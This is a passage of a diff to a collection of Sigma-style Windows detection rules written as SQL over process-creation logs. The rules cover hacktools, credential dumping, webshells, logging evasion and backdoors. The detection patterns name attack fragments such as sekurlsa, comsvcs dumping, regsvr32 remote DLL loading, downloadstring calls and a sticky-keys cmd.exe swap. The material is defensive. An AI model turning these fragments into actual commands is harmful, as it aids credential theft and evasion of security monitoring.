((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\MICROS~1\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\') AND CommandLine LIKE '%,Setting%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_netcat.yml" + "filename": "proc_creation_win_malware_elise.yml" }, { - "title": "New User Created Via Net.EXE With Never Expire Option", - "id": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", - "status": "test", - "description": "Detects creation of local users via the net.exe command with the option \"never expire\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "SafeBoot Registry Key Deleted Via Reg.EXE", + "id": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", + "status": "experimental", + "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products", + "author": "Nasreddine Bencherchali (Nextron Systems), Tim Shelton", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%expires:never%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_net_user_add_never_expire.yml" + "filename": "proc_creation_win_reg_delete_safeboot.yml" }, { - "title": "Suspicious Key Manager Access", - "id": "a4694263-59a8-4608-a3a0-6f8d3a51664c", + "title": "HackTool - SafetyKatz Execution", + "id": "b1876533-4ed5-4a83-90f3-b8645840a413", "status": "experimental", - "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1555.004" + "attack.t1003.001" ], "falsepositives": [ - "Administrative activity" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%keymgr%' ESCAPE '\\' AND CommandLine LIKE '%KRShowKeyMgr%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SafetyKatz.exe' ESCAPE '\\' OR OriginalFileName = 'SafetyKatz.exe' OR Description = 'SafetyKatz'))" ], - "filename": "proc_creation_win_rundll32_keymgr.yml" + "filename": "proc_creation_win_hktl_safetykatz.yml" }, { - "title": "Persistence Via Sticky Key Backdoor", - "id": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", - "status": "experimental", - "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen the sticky keys are \"activated\" the privilleged shell is launched.\n", - "author": "Sreeman", + "title": "PowerShell Base64 Encoded FromBase64String Cmdlet", + "id": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", + "status": "test", + "description": "Detects usage of a base64 encoded \"FromBase64String\" cmdlet in a process command line", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1546.008", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1140", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%/y %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\cmd.exe C:\\\\windows\\\\system32\\\\sethc.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%OjpGcm9tQmFzZTY0U3RyaW5n%' ESCAPE '\\' OR CommandLine LIKE '%o6RnJvbUJhc2U2NFN0cmluZ%' ESCAPE '\\' OR CommandLine LIKE '%6OkZyb21CYXNlNjRTdHJpbm%' ESCAPE '\\' OR (CommandLine LIKE '%OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA%' ESCAPE '\\' OR CommandLine LIKE '%oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_sticky_keys_replace.yml" + "filename": "proc_creation_win_powershell_base64_frombase64string.yml" }, { - "title": "Disable of ETW Trace", - "id": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", + "title": "Filter Driver Unloaded Via Fltmc.EXE", + "id": "4931188c-178e-4ee7-a348-39e8a7a56821", "status": "test", - "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", - "author": "@neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "Detect filter driver unloading activity via fltmc.exe", + "author": "Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", "attack.t1070", - "attack.t1562.006", - "car.2016-04-002" + "attack.t1562", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%cl%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%clear-log%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%sl%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%set-log%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%logman%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\' AND CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%--p%' ESCAPE '\\' AND CommandLine LIKE '%-ets%' ESCAPE '\\') OR CommandLine LIKE '%Remove-EtwTraceProvider%' ESCAPE '\\' OR (CommandLine LIKE '%Set-EtwTraceProvider%' ESCAPE '\\' AND CommandLine LIKE '%0x11%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND CommandLine LIKE '%unload%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%unload rtp\\_filesystem\\_filter' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_etw_trace_evasion.yml" + "filename": "proc_creation_win_fltmc_unload_driver.yml" }, { - "title": "TAIDOOR RAT DLL Load", - "id": "d1aa3382-abab-446f-96ea-4de52908210b", - "status": "test", - "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Credential Dumping Attempt Using New NetworkProvider - CLI", + "id": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", + "status": "experimental", + "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1055.001" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Unknown" + "Other legitimate network providers used and not filtred in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%dll,MyStart%' ESCAPE '\\' OR CommandLine LIKE '%dll MyStart%' ESCAPE '\\') OR (CommandLine LIKE '% MyStart' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\NetworkProvider%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_taidoor.yml" + "filename": "proc_creation_win_registry_new_network_provider.yml" }, { - "title": "Potential BearLPE Exploitation", - "id": "931b6802-d6a6-4267-9ffa-526f57f22aaf", - "status": "test", - "description": "Detects potential exploitation of the BearLPE exploit using Task Scheduler \".job\" import arbitrary DACL write\\par", - "author": "Olaf Hartong", + "title": "PUA - NSudo Execution", + "id": "771d1eb5-9587-4568-95fb-9ec44153a012", + "status": "experimental", + "description": "Detects the use of NSudo tool for command execution", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "tags": [ - "attack.privilege_escalation", - "attack.t1053.005", - "car.2013-08-001" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Legitimate use by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/RP%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\NSudo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NSudoLC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NSudoLG.exe' ESCAPE '\\') OR OriginalFileName IN ('NSudo.exe', 'NSudoLC.exe', 'NSudoLG.exe')) AND (CommandLine LIKE '%-U:S %' ESCAPE '\\' OR CommandLine LIKE '%-U:T %' ESCAPE '\\' OR CommandLine LIKE '%-U:E %' ESCAPE '\\' OR CommandLine LIKE '%-P:E %' ESCAPE '\\' OR CommandLine LIKE '%-M:S %' ESCAPE '\\' OR CommandLine LIKE '%-M:H %' ESCAPE '\\' OR CommandLine LIKE '%-U=S %' ESCAPE '\\' OR CommandLine LIKE '%-U=T %' ESCAPE '\\' OR CommandLine LIKE '%-U=E %' ESCAPE '\\' OR CommandLine LIKE '%-P=E %' ESCAPE '\\' OR CommandLine LIKE '%-M=S %' ESCAPE '\\' OR CommandLine LIKE '%-M=H %' ESCAPE '\\' OR CommandLine LIKE '%-ShowWindowMode:Hide%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_other_bearlpe.yml" + "filename": "proc_creation_win_pua_nsudo.yml" }, { - "title": "RunDLL32 Spawning Explorer", - "id": "caa06de8-fdef-4c91-826a-7f9e163eef4b", + "title": "Suspicious Regsvr32 HTTP IP Pattern", + "id": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", "status": "experimental", - "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way", - "author": "elhoim, CD_ROM_", + "description": "Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1218.010" ], "falsepositives": [ - "Unknown" + "FQDNs that start with a number" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (ParentCommandLine LIKE '%\\\\shell32.dll,Control\\_RunDLL%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /s%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND (CommandLine LIKE '% /i:http://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://9%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://9%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_spawn_explorer.yml" + "filename": "proc_creation_win_regsvr32_http_pattern.yml" }, { - "title": "Potential CVE-2022-29072 Exploitation Attempt", - "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3", + "title": "Unusual Child Process of dns.exe", + "id": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", "status": "experimental", - "description": "Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.\n7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow.\nThe command runs in a child process under the 7zFM.exe process.\n", - "author": "frack113", + "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch", "tags": [ - "attack.execution", - "cve.2022.29072" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ParentProcessName LIKE '%\\\\7zFM.exe' ESCAPE '\\') AND NOT (((CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\')) OR (CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2022_29072_7zip.yml" + "filename": "proc_creation_win_dns_susp_child_process.yml" }, { - "title": "HackTool - SafetyKatz Execution", - "id": "b1876533-4ed5-4a83-90f3-b8645840a413", + "title": "PUA- IOX Tunneling Tool Execution", + "id": "d7654f02-e04b-4934-9838-65c46f187ebc", "status": "experimental", - "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SafetyKatz.exe' ESCAPE '\\' OR OriginalFileName = 'SafetyKatz.exe' OR Description = 'SafetyKatz'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\iox.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe fwd -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe fwd -r %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -r %' ESCAPE '\\') OR (Hashes LIKE '%MD5=9DB2D314DD3F704A02051EF5EA210993%' ESCAPE '\\' OR Hashes LIKE '%SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD%' ESCAPE '\\' OR Hashes LIKE '%SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731%' ESCAPE '\\') OR md5 = '9db2d314dd3f704a02051ef5ea210993' OR sha1 = '039130337e28a6623ecf9a0a3da7d92c5964d8dd' OR sha256 = 'c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731'))" ], - "filename": "proc_creation_win_hktl_safetykatz.yml" + "filename": "proc_creation_win_pua_iox.yml" }, { - "title": "Windows Defender Download Activity", - "id": "46123129-1024-423e-9fae-43af4a0fa9a5", - "status": "test", - "description": "Detect the use of Windows Defender to download payloads", - "author": "Matthew Matchen", + "title": "MERCURY APT Activity", + "id": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", + "status": "experimental", + "description": "Detects suspicious command line patterns seen being used by MERCURY APT", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.t1059.001", + "attack.g0069" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%MpCmdRun.exe%' ESCAPE '\\' OR Description = 'Microsoft Malware Protection Command Line Utility') AND (CommandLine LIKE '%DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%url%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-exec bypass -w 1 -enc%' ESCAPE '\\' AND CommandLine LIKE '%UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml" + "filename": "proc_creation_win_apt_mercury.yml" }, { - "title": "Exploiting CVE-2019-1388", - "id": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", - "status": "stable", - "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", + "title": "Webshell Hacking Activity Patterns", + "id": "4ebc877f-4612-45cb-b3a5-8e3834db36c9", + "status": "experimental", + "description": "Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\') AND (IntegrityLevel = 'System' OR (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%comsvcs%' ESCAPE '\\') OR (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% a %' ESCAPE '\\' AND CommandLine LIKE '% -m%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% user %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% localgroup %' ESCAPE '\\' AND CommandLine LIKE '% administrators %' ESCAPE '\\' AND CommandLine LIKE '%/add%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\adfind.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Nanodump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '%reg save %' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% sekurlsa%' ESCAPE '\\' OR CommandLine LIKE '%.dmp full%' ESCAPE '\\' OR CommandLine LIKE '%process call create%' ESCAPE '\\' OR CommandLine LIKE '%whoami /priv%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2019_1388.yml" + "filename": "proc_creation_win_webshell_hacking.yml" }, { - "title": "Suspicious Outlook Child Process", - "id": "208748f7-881d-47ac-a29c-07ea84bf691d", + "title": "Remote Access Tool - AnyDesk Silent Installation", + "id": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", "status": "test", - "description": "Detects a suspicious process spawning from an Outlook process.", - "author": "Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team", + "description": "Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.", + "author": "Ján Trenčanský", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate deployment of AnyDesk" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%--install%' ESCAPE '\\' AND CommandLine LIKE '%--start-with-win%' ESCAPE '\\' AND CommandLine LIKE '%--silent%' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_outlook_susp_child_processes.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk_silent_install.yml" }, { - "title": "Parent in Public Folder Suspicious Process", - "id": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", - "status": "experimental", - "description": "This rule detects suspicious processes with parent images located in the C:\\Users\\Public folder", + "title": "Suspicious HWP Sub Processes", + "id": "023394c4-29d5-46ab-92b8-6a534c6f447b", + "status": "test", + "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.initial_access", + "attack.t1566.001", + "attack.execution", + "attack.t1203", + "attack.t1059.003", + "attack.g0032" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%wscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%cscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%mshta.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Hwp.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\gbb.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_execution_from_public_folder_as_parent.yml" + "filename": "proc_creation_win_hwp_exploits.yml" }, { - "title": "Potential Dridex Activity", - "id": "e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e", - "status": "stable", - "description": "Detects potential Dridex acitvity via specific process patterns", - "author": "Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Uninstall Sysinternals Sysmon", + "id": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", + "status": "test", + "description": "Detects the removal of Sysmon, which could be a potential attempt at defense evasion", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055", - "attack.discovery", - "attack.t1135", - "attack.t1033" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') AND NOT (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '% -s %' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.dll%' ESCAPE '\\'))) OR (ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' AND CommandLine LIKE '% /all%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% 